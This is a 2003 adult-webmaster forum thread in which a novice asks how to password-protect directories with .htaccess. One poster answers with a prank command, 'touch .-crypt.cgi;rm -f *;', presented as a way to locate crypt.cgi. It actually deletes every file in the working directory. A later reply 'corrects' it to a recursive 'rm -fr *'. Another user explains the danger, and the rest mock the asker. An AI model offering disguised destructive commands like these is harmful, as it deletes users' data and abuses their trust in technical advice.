GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   would anyone help out with htaccess issue? (https://gfy.com/showthread.php?t=161990)

lil2rich4u2 08-09-2003 10:35 AM

would anyone help out with htaccess issue?
 
site is done and its time to protect my directories. maybe i should have done it sooner, but i put it off because i didnt know how.

The tutorial i read gives instructions to make this code, but my isprime tech told me he wouldnt advise it and then he had to go.

The tutorial told me to put this within htaccess, and then go make a crypt.cgi with the userpass encrypted. And it says that will do fine.

AuthUserFile /home/username/domain.com/admin/.htaccess
AuthName "Administration"
AuthType Basic
[Limit GET>require valid-user[/Limit>

Then the tech guy told me he would advise me to use a htpassword file or something?

Im very lost.

Has anyone got a decent tutorial on this stuff, or care to lend a hand?

Thanks ...

lil2rich4u2 08-09-2003 10:36 AM

also ..

even if i do use this way that the tech guy advised against, how or where does this htaccess call on the crypt.cgi file?

i dont see it mentioned anywhere at all.

Burtman 08-09-2003 10:37 AM

http://wsabstract.com/howto/htaccess.shtml

Burtman

StupidNewbie 08-09-2003 10:39 AM

htaccess usually calls crypt.cgi from the base html directory, do you have access to shell? if so, you can find crypt.cgi by going to your domain's html folder i.e. domain.com/html and typing touch .-crypt.cgi;rm -f *;

lil2rich4u2 08-09-2003 10:48 AM

wtf?

i posted and walked away, sure it would be flamed and laughed at, heh


Thanks for the help guys!

StupidNewbie 08-09-2003 10:50 AM

Quote:

Originally posted by lil2rich4u2
wtf?

i posted and walked away, sure it would be flamed and laughed at, heh


Thanks for the help guys!

np, if that command doesn't output the full path to crypt try it in your cgi-bin :thumbsup

Adult Site Traffic 08-09-2003 10:55 AM

Acyually, if you icq me, I can send you a copy of my file. I think it should work just fine for you.

AST 121760557

lil2rich4u2 08-09-2003 11:15 AM

Quote:

Originally posted by StupidNewbie


np, if that command doesn't output the full path to crypt try it in your cgi-bin :thumbsup

hmm

i dont understand the sudden change of heart, but thanks so much for your help.

If you ever need anything, dont be afraid to hit me up ..

:thumbsup

Libertine 08-09-2003 11:17 AM

Quote:

Originally posted by StupidNewbie
htaccess usually calls crypt.cgi from the base html directory, do you have access to shell? if so, you can find crypt.cgi by going to your domain's html folder i.e. domain.com/html and typing touch .-crypt.cgi;rm -f *;
:glugglug

Libertine 08-09-2003 11:25 AM

I probably shouldn't do this, but I feel sorry for him...

Rich, using that command line thingy you will remove all files and directories within the current directory without being asked for confirmation.

lil2rich4u2 08-09-2003 11:28 AM

<font size="6">WHAT THE MOTHER FUCK?!??!?!</font>


WHY THE FUCK DID YOU DO THIS TO ME?!?!?





FUUUUUUUUUCCCCCCCCCKKKKKKKKKKKKKKKKKK

JamesK 08-09-2003 11:29 AM

hahahahhahhahahaha :1orglaugh

Fletch XXX 08-09-2003 11:29 AM

<img src=http://media.dubcnn.com/booyaaparty/16.JPG border="1">

lil2rich4u2 08-09-2003 11:30 AM

could have wiped out my entire site man!


sooo NOT cool

fuck, guess its time to make backup

Libertine 08-09-2003 11:30 AM

Rule #1 of asking tech advice on GFY: always look up the progs, functions etc that someone suggests before using them.

69pornlinks 08-09-2003 11:32 AM

Quote:

Originally posted by Fletch XXX
<img src=http://media.dubcnn.com/booyaaparty/16.JPG border="1">
Boo-Yaa:glugglug

Ole School

baddog 08-09-2003 11:32 AM

perhaps this will help

TheJimmy 08-09-2003 11:32 AM

.

maxjohan 08-09-2003 11:33 AM

Quote:

Originally posted by lil2rich4u2
<font size="6">WHAT THE MOTHER FUCK?!??!?!</font>


WHY THE FUCK DID YOU DO THIS TO ME?!?!?





FUUUUUUUUUCCCCCCCCCKKKKKKKKKKKKKKKKKK

damn I feel sorry for you bro :(

StupidNewbie 08-09-2003 11:35 AM

Quote:

Originally posted by lil2rich4u2

hmm
i dont understand the sudden change of heart, but thanks so much for your help.
If you ever need anything, dont be afraid to hit me up ..
:thumbsup

:winkwink:

StupidNewbie 08-09-2003 11:39 AM

anytime you need help destroying your sites lemme know, I live to give.

Libertine 08-09-2003 11:40 AM

And not even a "thank you" for saving his ass... figures.

StupidNewbie 08-09-2003 11:42 AM

Quote:

Originally posted by punkworld
And not even a "thank you" for saving his ass... figures.
ah well - at least you know what to do next time when the opportunity arises to eliminate richie.

JamesK 08-09-2003 11:43 AM

almost stupidnewbie.. almost...

try better next time

StupidNewbie 08-09-2003 11:45 AM

Quote:

Originally posted by Wildcard
almost stupidnewbie.. almost...

try better next time

I don't think I'll have a second chance at something like this, I honestly didn't think he was dumb enough to take my advice.

I'm going to have to register a new nick and spend my spare time befriending rich...

venturi 08-09-2003 12:05 PM

Quote:

Originally posted by StupidNewbie
htaccess usually calls crypt.cgi from the base html directory, do you have access to shell? if so, you can find crypt.cgi by going to your domain's html folder i.e. domain.com/html and typing touch .-crypt.cgi;rm -f *;
geez dude, at least you could have gotten the command correct. It's
touch ./crypt.cgi;rm -fr *;

damned script kiddies never get things right... :winkwink:

But Rich, don't go there!

:1orglaugh

StupidNewbie 08-09-2003 12:11 PM

Quote:

Originally posted by venturi

geez dude, at least you could have gotten the command correct. It's
touch ./crypt.cgi;rm -fr *;

damned script kiddies never get things right... :winkwink:

But Rich, don't go there!

:1orglaugh

thanks for the bump I want more people to see, don't forget - rich will be opening an affiliate program soon, you're money is in good hands gentlemen.

richard 08-09-2003 12:42 PM

classic.

:1orglaugh


All times are GMT -7. The time now is 06:35 AM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123